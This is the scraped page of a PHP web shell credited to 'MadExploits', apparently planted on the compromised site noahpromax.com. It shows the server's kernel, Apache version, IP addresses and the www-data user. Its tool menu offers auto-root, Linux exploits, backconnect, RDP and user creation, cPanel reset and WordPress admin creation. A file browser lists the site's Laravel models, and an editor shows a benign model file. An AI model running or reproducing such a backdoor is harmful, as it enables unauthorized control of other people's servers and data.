Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.118
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpromax.com /
source /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
Advertisement.php
325
B
-rw-r--r--
Blog.php
539
B
-rw-r--r--
BlogSlider.php
333
B
-rw-r--r--
Category.php
1.38
KB
-rw-r--r--
ContactEntry.php
425
B
-rw-r--r--
ContactInfo.php
338
B
-rw-r--r--
ContactRequest.php
185
B
-rw-r--r--
Contactus.php
300
B
-rw-r--r--
FaqsAnswer.php
348
B
-rw-r--r--
FaqsQuestion.php
318
B
-rw-r--r--
HeaderInfo.php
257
B
-rw-r--r--
Images.php
482
B
-rw-r--r--
Order.php
728
B
-rw-r--r--
Page.php
215
B
-rw-r--r--
Product.php
2
KB
-rw-r--r--
ProductColor.php
222
B
-rw-r--r--
ProductGallery.php
598
B
-rw-r--r--
ProductStock.php
183
B
-rw-r--r--
Projects.php
518
B
-rw-r--r--
Review.php
349
B
-rw-r--r--
Services.php
642
B
-rw-r--r--
Setting.php
368
B
-rw-r--r--
Slider.php
362
B
-rw-r--r--
SocialMediaLink.php
226
B
-rw-r--r--
Subscriber.php
287
B
-rw-r--r--
Testimonial.php
415
B
-rw-r--r--
Type.php
472
B
-rw-r--r--
User.php
943
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ProductGallery.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class ProductGallery extends Model { use HasFactory; protected $table='products_gallery'; const CREATED_AT = 'created'; const UPDATED_AT = 'modified'; protected $fillable=[ 'product_id', 'image', 'product_image_big', 'alt', 'product_image_big_alt', 'img_title', 'description', 'display_order', 'status' ]; public function product(){ return $this->belongsTo(Product::class); } }
Close